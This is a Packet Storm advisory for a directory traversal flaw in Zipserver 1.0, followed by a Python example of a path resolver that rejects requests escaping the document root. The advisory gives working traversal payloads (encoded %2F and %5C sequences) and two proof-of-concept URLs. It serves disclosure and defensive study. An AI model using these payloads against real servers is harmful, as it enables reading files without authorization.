Zipserver 1.0 Directory Traversal

2010-05-18T00:00:00
ID PACKETSTORM:89604
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-18T00:00:00

Description

                                        
                                            `#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Directory Traversal #  
# Software.................Zipserver 1.0 #  
# Download.................http://sourceforge.net/projects/zipserver/ #  
# Date.....................5/15/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially #  
# crafted URL. #  
# #  
# #  
# ##Exploit## #  
# #  
# %2F../ #  
# %5C../ #  
# #  
# #  
# ##Proof of Concept## #  
# #  
# http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/ #  
# http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/ #  
# #  
#============================================================================================================#  
`
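The root cause described above is a file-serving handler that checks the raw URL for `../` before the percent-encoded separators (`%2F`, `%5C`) are decoded. The following is an added defensive example, not code from Zipserver or from the advisory: it decodes first, treats backslashes as separators, walks the path segments, and refuses any request that would climb above the document root. The document root and the benign sample requests are constructed; the two traversal requests are the advisory's own proof-of-concept paths.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the example; any absolute path works.
DOC_ROOT = "/srv/zipserver/www"


def resolve_request_path(request_path: str, doc_root: str = DOC_ROOT) -> Optional[str]:
    """Map a raw URL path onto a filesystem path under doc_root.

    Returns the resolved path, or None if the request would escape doc_root.
    Percent-decoding happens before any traversal check, so %2F and %5C
    cannot hide a separator from it (the Zipserver 1.0 bug pattern).
    """
    path = request_path.split("?", 1)[0]          # drop any query string
    for _ in range(3):                             # bounded loop catches double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if "\x00" in path:                             # NUL can truncate the path at the OS layer
        return None
    path = path.replace("\\", "/")                 # Windows-style servers accept '\' too
    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:                          # would climb above doc_root: reject
                return None
            stack.pop()
            continue
        stack.append(segment)
    return posixpath.join(doc_root, *stack)        # empty stack resolves to doc_root itself


# Constructed sample requests: the advisory's two PoC paths plus benign ones.
SAMPLE_REQUESTS = [
    "/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/",
    "/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/",
    "/docs/index.html",
    "/docs/../index.html",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request, "->", resolve_request_path(request))
```

Rejecting the request outright (rather than silently clamping it to the root) is deliberate: a `..` that tries to leave the document root is a signal worth logging, not a path to quietly serve.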